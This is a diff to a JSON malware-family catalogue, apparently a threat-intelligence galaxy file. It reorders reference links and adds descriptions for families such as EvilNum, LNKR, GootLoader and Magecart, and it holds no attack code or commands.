+ "https://maskop9.wordpress.com/2019/02/06/analysis-of-jacksbot-backdoor/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/",
+ "https://www.eff.org/files/2018/01/29/operation-manul.pdf"
],
"synonyms": [
"Jacksbot"
@@ -7131,15 +7633,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "8abd10df-2c31-4895-8ec1-270603078f47",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "ff24997d-1f17-4f00-b9b8-b3392146540f",
"value": "jSpy"
},
@@ -7148,8 +7641,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/jar.octopus_scanner",
- "https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain",
- "http://blog.nsfocus.net/github-ocs-0605/"
+ "http://blog.nsfocus.net/github-ocs-0605/",
+ "https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain"
],
"synonyms": [],
"type": []
@@ -7175,13 +7668,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/jar.qealler",
+ "https://www.herbiez.com/?p=1352",
"https://github.com/jeFF0Falltrades/Malware-Writeups/blob/master/Qealler/Qealler-Unloaded.pdf",
+ "https://www.securityinbits.com/malware-analysis/similarity-between-qealler-pyrogenic-variants-part-0x3/",
+ "https://www.zscaler.com/blogs/research/qealler-new-jar-based-information-stealer",
"https://www.securityinbits.com/malware-analysis/unpacking/unpacking-pyrogenic-qealler-using-java-agent-part-0x2/",
"https://www.cyberark.com/threat-research-blog/qealler-the-silent-java-credential-thief/",
- "https://www.securityinbits.com/malware-analysis/similarity-between-qealler-pyrogenic-variants-part-0x3/",
- "https://www.securityinbits.com/malware-analysis/pyrogenic-infostealer-static-analysis-part-0x1/",
- "https://www.herbiez.com/?p=1352",
- "https://www.zscaler.com/blogs/research/qealler-new-jar-based-information-stealer"
+ "https://www.securityinbits.com/malware-analysis/pyrogenic-infostealer-static-analysis-part-0x1/"
],
"synonyms": [
"Pyrogenic Infostealer"
@@ -7198,23 +7691,14 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/jar.qrat",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-as-a-Service/",
"https://www.digitrustgroup.com/java-rat-qrat/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/updated-qnode-rat-downloader-distributed-as-trump-video-scandal/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rats-and-spam-the-nodejs-qrat/"
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rats-and-spam-the-nodejs-qrat/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/updated-qnode-rat-downloader-distributed-as-trump-video-scandal/"
],
"synonyms": [
"Quaverse RAT"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "c3a784ee-cef7-4604-a5ba-ec7b193a5152",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "ef385825-bfa1-4e8c-b368-522db78cf1bd",
"value": "QRat"
},
@@ -7223,8 +7707,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/jar.ratty",
- "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
- "https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/"
+ "https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/",
+ "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/"
],
"synonyms": [],
"type": []
@@ -7250,18 +7734,20 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/jar.strrat",
- "https://twitter.com/MsftSecIntel/status/1395138347601854465",
- "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
- "https://www.gdatasoftware.com/blog/strrat-crimson",
- "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
- "https://www.jaiminton.com/reverse-engineering/strrat",
- "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-strrat-zloader-honeygain",
- "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape",
"https://forensicitguy.github.io/strrat-attached-to-msi/",
- "https://www.jaiminton.com/reverse-engineering/strrat#",
- "https://isc.sans.edu/diary/rss/27798",
+ "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
+ "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
+ "https://any.run/cybersecurity-blog/strrat-malware-analysis-of-a-jar-archive/",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf",
+ "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-strrat-zloader-honeygain",
"https://www.fortinet.com/blog/threat-research/new-strrat-rat-phishing-campaign",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf"
+ "https://www.jaiminton.com/reverse-engineering/strrat",
+ "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape",
+ "https://resources.securityscorecard.com/cybersecurity/analyze-java-malware-strrat#page=1",
+ "https://www.gdatasoftware.com/blog/strrat-crimson",
+ "https://isc.sans.edu/diary/rss/27798",
+ "https://www.jaiminton.com/reverse-engineering/strrat#",
+ "https://twitter.com/MsftSecIntel/status/1395138347601854465"
],
"synonyms": [],
"type": []
@@ -7302,8 +7788,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak",
- "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
"http://www.kahusecurity.com/posts/reflow_javascript_backdoor.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
"https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html"
],
"synonyms": [
@@ -7319,24 +7805,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.bateleur",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-niagara",
- "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
"https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/"
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor",
+ "https://www.secureworks.com/research/threat-profiles/gold-niagara"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "81faf0c1-0595-436b-a66a-05d8b435bccd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "fb75a753-24ba-4b58-b7ed-2e39b0c68c65",
"value": "Bateleur"
},
@@ -7360,12 +7837,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.cactustorch",
- "https://github.com/mdsecactivebreach/CACTUSTORCH",
- "https://www.macnica.net/file/mpression_automobile.pdf",
- "https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/",
- "https://www.codercto.com/a/46729.html",
"https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf",
- "https://forensicitguy.github.io/analyzing-cactustorch-hta-cobaltstrike/"
+ "https://www.macnica.net/file/mpression_automobile.pdf",
+ "https://forensicitguy.github.io/analyzing-cactustorch-hta-cobaltstrike/",
+ "https://www.codercto.com/a/46729.html",
+ "https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/",
+ "https://github.com/mdsecactivebreach/CACTUSTORCH"
],
"synonyms": [],
"type": []
@@ -7378,8 +7855,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.chromeback",
- "https://www.gosecure.net/blog/2022/02/10/malicious-chrome-browser-extension-exposed-chromeback-leverages-silent-extension-loading/",
- "https://unit42.paloaltonetworks.com/chromeloader-malware/"
+ "https://unit42.paloaltonetworks.com/chromeloader-malware/",
+ "https://www.gosecure.net/blog/2022/02/10/malicious-chrome-browser-extension-exposed-chromeback-leverages-silent-extension-loading/"
],
"synonyms": [],
"type": []
@@ -7421,8 +7898,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.darkwatchman",
- "https://securityintelligence.com/posts/hive00117-fileless-malware-delivery-eastern-europe/",
- "https://www.prevailion.com/darkwatchman-new-fileness-techniques/"
+ "https://www.prevailion.com/darkwatchman-new-fileness-techniques/",
+ "https://securityintelligence.com/posts/hive00117-fileless-malware-delivery-eastern-europe/"
],
"synonyms": [],
"type": []
@@ -7451,6 +7928,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.doenerium",
+ "https://perception-point.io/doenerium-malware/",
"https://twitter.com/0xToxin/status/1572612089901993985"
],
"synonyms": [],
@@ -7475,21 +7953,21 @@
"value": "Enrume"
},
{
- "description": "",
+ "description": "According proofpoint, EvilNum is a backdoor that can be used for data theft or to load additional payloads. The malware includes multiple interesting components to evade detection and modify infection paths based on identified antivirus software.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.evilnum",
- "http://blog.nsfocus.net/agentvxapt-evilnum/",
+ "https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf",
"https://github.com/eset/malware-ioc/tree/master/evilnum",
+ "http://blog.nsfocus.net/agentvxapt-evilnum/",
+ "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/",
+ "https://www.zscaler.com/blogs/security-research/return-evilnum-apt-updated-ttps-and-new-targets",
+ "http://www.pwncode.io/2018/05/javascript-based-bot-using-github-c.html",
+ "https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw",
"https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/",
"https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html",
"https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw",
- "http://www.pwncode.io/2018/05/javascript-based-bot-using-github-c.html",
- "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/",
- "https://www.zscaler.com/blogs/security-research/return-evilnum-apt-updated-ttps-and-new-targets",
- "https://securelist.com/deathstalker-mercenary-triumvirate/98177/",
- "https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf"
+ "https://securelist.com/deathstalker-mercenary-triumvirate/98177/"
],
"synonyms": [],
"type": []
@@ -7502,27 +7980,29 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.fakeupdates",
+ "https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html",
+ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
+ "https://www.lac.co.jp/lacwatch/report/20220407_002923.html",
+ "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee",
+ "https://www.sentinelone.com/labs/socgholish-diversifies-and-expands-its-malware-staging-infrastructure-to-counter-defenders/",
"https://www.mandiant.com/resources/they-come-in-the-night-ransomware-deployment-trends",
- "https://www.digitalinformationworld.com/2022/04/threatening-redirect-web-service.html",
- "https://www.menlosecurity.com/blog/increase-in-attack-socgholish",
+ "https://thehackernews.com/2022/07/microsoft-links-raspberry-robin-usb.html?_m=3n%2e009a%2e2800%2ejp0ao0cjb8%2e1shm",
"https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/",
- "https://blog.malwarebytes.com/threat-analysis/2018/04/fakeupdates-campaign-leverages-multiple-website-platforms/",
- "https://twitter.com/MsftSecIntel/status/1522690116979855360",
- "https://blog.sucuri.net/2022/08/socgholish-5-years-of-massive-website-infections.html",
+ "https://www.digitalinformationworld.com/2022/04/threatening-redirect-web-service.html",
"https://blog.malwarebytes.com/threat-intelligence/2022/06/makemoney-malvertising-campaign-adds-fake-update-template/",
"https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt",
- "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee",
- "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack",
- "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://www.cybereason.com/blog/threat-analysis-report-socgholish-and-zloader-from-fake-updates-and-installers-to-owning-your-systems",
- "https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html",
- "https://expel.io/blog/incident-report-spotting-socgholish-wordpress-injection/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf",
- "https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://blog.malwarebytes.com/threat-analysis/2018/04/fakeupdates-campaign-leverages-multiple-website-platforms/",
"https://experience.mandiant.com/trending-evil/p/1",
- "https://www.lac.co.jp/lacwatch/report/20220407_002923.html",
- "https://thehackernews.com/2022/07/microsoft-links-raspberry-robin-usb.html?_m=3n%2e009a%2e2800%2ejp0ao0cjb8%2e1shm"
+ "https://twitter.com/MsftSecIntel/status/1522690116979855360",
+ "https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://expel.io/blog/incident-report-spotting-socgholish-wordpress-injection/",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/",
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf",
+ "https://www.menlosecurity.com/blog/increase-in-attack-socgholish",
+ "https://blog.sucuri.net/2022/08/socgholish-5-years-of-massive-website-infections.html",
+ "https://www.cybereason.com/blog/threat-analysis-report-socgholish-and-zloader-from-fake-updates-and-installers-to-owning-your-systems"
],
"synonyms": [
"FakeUpdate",
@@ -7530,15 +8010,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "cd32b19e-c365-4efc-9998-548e50e04a4c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "cff35ce3-8d6f-417b-ae6c-a9e6a60ee26c",
"value": "FAKEUPDATES"
},
@@ -7547,30 +8018,25 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.gootloader",
- "https://threatresearch.ext.hp.com/tips-for-automating-ioc-extraction-from-gootloader-a-changing-javascript-malware/",
+ "https://dinohacks.blogspot.com/2022/06/loading-gootloader.html",
"https://blogs.blackberry.com/en/2022/07/gootloader-from-seo-poisoning-to-multi-stage-downloader",
- "https://news.sophos.com/en-us/2021/08/12/gootloaders-mothership-controls-malicious-content/",
- "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
- "https://blog.nviso.eu/2022/07/20/analysis-of-a-trojanized-jquery-script-gootloader-unleashed/",
- "https://community.riskiq.com/article/f5d5ed38",
- "https://redcanary.com/blog/gootloader",
- "https://experience.mandiant.com/trending-evil/p/1",
- "https://labs.sentinelone.com/gootloader-initial-access-as-a-service-platform-expands-its-search-for-high-value-targets/",
"https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf",
- "https://dinohacks.blogspot.com/2022/06/loading-gootloader.html"
+ "https://www.esentire.com/web-native-pages/gootloader-unloaded",
+ "https://labs.sentinelone.com/gootloader-initial-access-as-a-service-platform-expands-its-search-for-high-value-targets/",
+ "https://www.mandiant.com/resources/blog/tracking-evolution-gootloader-operations",
+ "https://experience.mandiant.com/trending-evil/p/1",
+ "https://www.esentire.com/blog/gootloader-leads-to-cobalt-strike-and-hand-on-keyboard-activity",
+ "https://www.esentire.com/blog/gootloader-striking-with-a-new-infection-technique",
+ "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
+ "https://redcanary.com/blog/gootloader",
+ "https://threatresearch.ext.hp.com/tips-for-automating-ioc-extraction-from-gootloader-a-changing-javascript-malware/",
+ "https://blog.nviso.eu/2022/07/20/analysis-of-a-trojanized-jquery-script-gootloader-unleashed/",
+ "https://news.sophos.com/en-us/2021/08/12/gootloaders-mothership-controls-malicious-content/",
+ "https://community.riskiq.com/article/f5d5ed38"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "0bdb6f1c-1229-4556-a535-7444ddfbd7a9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "5b2569e5-aeb2-4708-889f-c6d598bd5e14",
"value": "GootLoader"
},
@@ -7580,8 +8046,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.grelos",
"https://www.riskiq.com/blog/labs/magecart-medialand/",
- "https://community.riskiq.com/article/8c4b4a7a",
- "https://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745"
+ "https://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745",
+ "https://community.riskiq.com/article/8c4b4a7a"
],
"synonyms": [],
"type": []
@@ -7594,20 +8060,20 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.secureworks.com/research/threat-profiles/gold-niagara",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
+ "https://www.mandiant.com/resources/evolution-of-fin7",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
"https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/",
"https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
"https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
- "https://www.mandiant.com/resources/evolution-of-fin7",
"https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/",
- "https://twitter.com/ItsReallyNick/status/1059898708286939136"
+ "https://twitter.com/ItsReallyNick/status/1059898708286939136",
+ "https://www.secureworks.com/research/threat-profiles/gold-niagara",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/"
],
"synonyms": [
"Harpy"
@@ -7675,10 +8141,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.kopiluwak",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
"https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack",
"https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
"https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
+ "https://pdfhost.io/v/F0@QElMu2_MacProStorage_2017FinalBitdefenderWhitepaperNetrepserA4en_ENBitdefenderWhitepaperNetrepserA4en_ENindd.pdf",
+ "https://www.mandiant.com/resources/blog/turla-galaxy-opportunity",
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/",
+ "https://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html"
],
"synonyms": [],
"type": []
@@ -7687,14 +8157,14 @@
"value": "KopiLuwak"
},
{
- "description": "",
+ "description": "The LNKR trojan is a malicious browser extension that will monitor the websites visited by the user, looking for pages with administrative privileges such as blog sites or web-based virtual learning environments. When the administrative user posts to the page, the infected extension will execute stored cross-site scripting attack and injects malicious JavaScript into the legitimate HTML of the page. This is used to redirect the second-party visitors of the site to both benign and malicious domains. ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.lnkr",
- "https://krebsonsecurity.com/2020/03/the-case-for-limiting-your-browser-extensions/",
"https://github.com/Zenexer/lnkr/blob/master/recon/extensions/fanagokoaogopceablgmpndejhedkjjb/README.md",
+ "https://www.riskiq.com/blog/labs/lnkr-browser-extension/",
"https://github.com/Zenexer/lnkr",
- "https://www.riskiq.com/blog/labs/lnkr-browser-extension/"
+ "https://krebsonsecurity.com/2020/03/the-case-for-limiting-your-browser-extensions/"
],
"synonyms": [],
"type": []
@@ -7708,63 +8178,64 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart",
"https://maxkersten.nl/2020/02/24/closing-in-on-magecart-12/",
- "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
- "https://blog.malwarebytes.com/cybercrime/2021/05/newly-observed-php-based-skimmer-shows-ongoing-magecart-group-12-activity/",
- "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://maxkersten.nl/2020/01/20/ticket-resellers-infected-with-a-credit-card-skimmer/",
"https://marcoramilli.com/2020/02/19/uncovering-new-magecart-implant-attacking-ecommerce/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/mirrorthief-group-uses-magecart-skimming-attack-to-hit-hundreds-of-campus-online-stores-in-us-and-canada/",
"https://www.crowdstrike.com/blog/threat-actor-magecart-coming-to-an-ecommerce-store-near-you/",
- "https://www.perimeterx.com/blog/analyzing_magecart_malware_from_zero_to_hero/",
- "https://community.riskiq.com/article/743ea75b/description",
"https://maxkersten.nl/2020/02/17/following-the-tracks-of-magecart-12/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0719.pdf",
- "https://sansec.io/research/north-korea-magecart",
- "https://blog.sucuri.net/2020/07/skimmers-in-images-github-repos.html",
- "https://www.reflectiz.com/the-gocgle-web-skimming-campaign/",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://www.goggleheadedhacker.com/blog/post/14",
- "https://www.riskiq.com/blog/labs/magecart-nutribullet/",
- "https://twitter.com/AffableKraut/status/1415425132080816133?s=20",
- "https://twitter.com/MBThreatIntel/status/1416101496022724609",
- "https://www.reflectiz.com/ico-fines-ticketmaster-uk-1-25-million-for-security-failures-a-lesson-to-be-learned/",
- "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/",
- "https://blog.malwarebytes.com/cybercrime/2019/04/github-hosted-magecart-skimmer-used-against-hundreds-of-e-commerce-sites/",
- "https://www.riskiq.com/blog/labs/magecart-medialand/",
- "https://blog.malwarebytes.com/threat-intelligence/2021/11/credit-card-skimmer-evades-virtual-machines/",
- "https://geminiadvisory.io/magecart-google-tag-manager/",
- "https://community.riskiq.com/article/fda1f967",
- "https://sansec.io/research/magento-2-persistent-parasite",
- "https://community.riskiq.com/article/2efc2782",
"https://scotthelme.co.uk/introducing-script-watch-detect-magecart-style-attacks-fast/?utm_source=dlvr.it&utm_medium=twitter",
- "https://www.riskiq.com/blog/labs/magecart-group-12-olympics/",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/injecting-magecart-into-magento-global-config/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/magecart-skimming-attack-targets-mobile-users-of-hotel-chain-booking-websites/",
"https://sansec.io/research/magecart-corona-lockdown",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/us-local-government-services-targeted-by-new-magecart-credit-card-skimming-attack/",
- "https://www.riskiq.com/blog/labs/magecart-group-4-always-advancing/",
- "https://community.riskiq.com/article/017cf2e6",
- "https://www.riskiq.com/blog/labs/misconfigured-s3-buckets/",
- "https://sansec.io/labs/2020/01/25/magecart-hackers-arrested/",
"https://community.riskiq.com/article/30f22a00",
"https://blog.malwarebytes.com/threat-analysis/2020/06/web-skimmer-hides-within-exif-metadata-exfiltrates-credit-cards-via-image-files/",
- "https://blog.malwarebytes.com/cybercrime/2021/06/lil-skimmer-the-magecart-impersonator/",
- "https://blog.sucuri.net/2020/06/evasion-tactics-in-hybrid-credit-card-skimmers.html",
- "https://blog.malwarebytes.com/threat-intelligence/2021/09/the-many-tentacles-of-magecart-group-8/",
- "https://www.zdnet.com/article/web-skimmers-found-on-the-websites-of-intersport-claires-and-icing/",
"https://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/",
- "https://medium.com/reflectiz/csp-the-right-solution-for-the-web-skimming-pandemic-acb7a4414218",
- "https://community.riskiq.com/article/14924d61",
- "https://community.riskiq.com/article/5bea32aa",
+ "https://www.perimeterx.com/blog/analyzing_magecart_malware_from_zero_to_hero/",
+ "https://www.reflectiz.com/the-gocgle-web-skimming-campaign/",
+ "https://www.riskiq.com/blog/labs/magecart-group-4-always-advancing/",
+ "https://www.riskiq.com/blog/labs/misconfigured-s3-buckets/",
+ "https://blog.malwarebytes.com/cybercrime/2021/06/lil-skimmer-the-magecart-impersonator/",
+ "https://community.riskiq.com/article/743ea75b/description",
"https://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/",
- "https://securelist.com/apt-trends-report-q2-2019/91897/",
- "https://twitter.com/AffableKraut/status/1385030485676544001",
"https://geminiadvisory.io/wp-content/uploads/2020/07/Appendix-C-1.pdf",
- "https://blog.malwarebytes.com/threat-intelligence/2021/10/q-logger-skimmer-keeps-magecart-attacks-going/",
- "https://blog.sucuri.net/2021/07/magecart-swiper-uses-unorthodox-concatenation.html",
+ "https://geminiadvisory.io/keeper-magecart-group-infects-570-sites/",
+ "https://community.riskiq.com/article/2efc2782",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0719.pdf",
+ "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
+ "https://www.zdnet.com/article/web-skimmers-found-on-the-websites-of-intersport-claires-and-icing/",
+ "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/",
"https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html",
- "https://geminiadvisory.io/keeper-magecart-group-infects-570-sites/"
+ "https://blog.malwarebytes.com/threat-intelligence/2021/09/the-many-tentacles-of-magecart-group-8/",
+ "https://blog.malwarebytes.com/threat-intelligence/2021/10/q-logger-skimmer-keeps-magecart-attacks-going/",
+ "https://twitter.com/MBThreatIntel/status/1416101496022724609",
+ "https://community.riskiq.com/article/017cf2e6",
+ "https://community.riskiq.com/article/5bea32aa",
+ "https://www.goggleheadedhacker.com/blog/post/14",
+ "https://www.reflectiz.com/ico-fines-ticketmaster-uk-1-25-million-for-security-failures-a-lesson-to-be-learned/",
+ "https://www.zscaler.com/blogs/security-research/black-friday-scams-4-emerging-skimming-attacks-watch-holiday-season",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/us-local-government-services-targeted-by-new-magecart-credit-card-skimming-attack/",
+ "https://www.riskiq.com/blog/labs/magecart-nutribullet/",
+ "https://www.riskiq.com/blog/labs/magecart-group-12-olympics/",
+ "https://twitter.com/AffableKraut/status/1385030485676544001",
+ "https://sansec.io/research/magento-2-persistent-parasite",
